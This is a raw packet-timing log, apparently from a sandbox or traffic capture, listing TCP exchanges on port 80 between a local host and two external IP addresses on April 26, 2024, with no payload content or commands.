Apr 26, 2024 23:09:02.025962114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.026001930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.026029110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.026067972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.026854038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.026911020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.026951075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.026985884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027019978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027081013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027122974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027141094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027179003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027180910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027324915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027338028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027376890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027395964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027436018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027575970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027625084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027662039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027702093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027721882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027774096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.027848959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027862072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.027899981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028034925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028134108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028206110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028222084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028248072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028280020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028297901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028340101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028386116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028400898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028445005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028527975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028573036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028604984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028647900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028656006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028727055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028800011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028839111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028842926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028888941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.028892040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.028961897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029040098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029083967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029114962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029160023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029186964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029262066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029313087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029357910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029396057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029439926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029444933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029498100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029512882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029555082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029592991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029637098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.029663086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029742002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.029983044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.030028105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.030124903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.030169010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.030252934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.030349970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.030427933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.030469894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.030940056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031292915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031342983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.031390905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031438112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.031462908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031538010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031656027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031701088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.031790018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031847000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.031872034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.031936884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032035112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032082081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.032282114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032326937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.032507896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032601118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032860994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.032906055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033088923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033133030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033166885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033314943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033356905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033466101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033546925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033560991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033572912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033586025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033592939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033616066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033621073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033636093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033663988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033685923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033699989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033727884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033760071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033771992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033787966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033807993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033838034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033853054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033874989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033914089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.033916950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.033998013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034013987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034027100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034039021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034043074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034054041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034065008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034096003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034121990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034142971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034163952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034188986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034240961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034282923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034288883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034327030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034341097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034368992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034373045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034388065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034400940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034416914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034436941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034442902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034506083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034518003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034548044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034584999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034596920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034609079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034621954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034631014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034660101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034670115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034691095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034703970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034712076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034717083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034742117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034758091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034780025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034805059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034838915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034851074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034879923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034902096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034914970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034926891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034944057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034971952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.034976959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.034991026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035033941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035039902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035047054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035089016 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035110950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035123110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035156012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035167933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035219908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035233021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035250902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035262108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035291910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035296917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035397053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035413027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035439014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035475016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035520077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035547972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035578966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035623074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035624027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035635948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035669088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035700083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035744905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035783052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035789967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035794973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035809994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035831928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035835028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035875082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035880089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035895109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035934925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.035965919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.035989046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036031008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036032915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036079884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036092997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036112070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036129951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036168098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036267996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036309958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036355019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036356926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036371946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036402941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036412954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036415100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036452055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036456108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036468029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036508083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036510944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036600113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036644936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036761045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036773920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036806107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036823034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036859035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036875010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036910057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.036919117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.036967993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.078897953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.078963995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079020023 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079056025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079071999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079083920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079096079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079114914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079133987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079154015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079216957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079260111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079282045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079324007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079394102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079437017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079476118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079516888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079706907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079761028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079776049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079823971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079886913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.079936028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.079998016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080049038 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080060959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080116034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080130100 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080178976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080190897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080235004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080250978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080296040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080351114 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080398083 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080410004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080450058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080461025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080507040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080519915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080563068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080708027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080750942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080763102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080806017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080837965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080869913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080887079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080899954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.080910921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080951929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.080966949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081022978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081036091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081083059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081111908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081161022 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081187963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081234932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081278086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081331015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081342936 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081387043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081549883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081599951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081620932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081671953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081684113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081727982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081742048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081784010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081793070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081842899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081856012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081882000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.081902981 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.081922054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.204752922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.204768896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.204781055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.204849005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.246995926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.249161005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.292947054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.292979956 CEST	80	49734	176.97.76.106	192.168.2.4
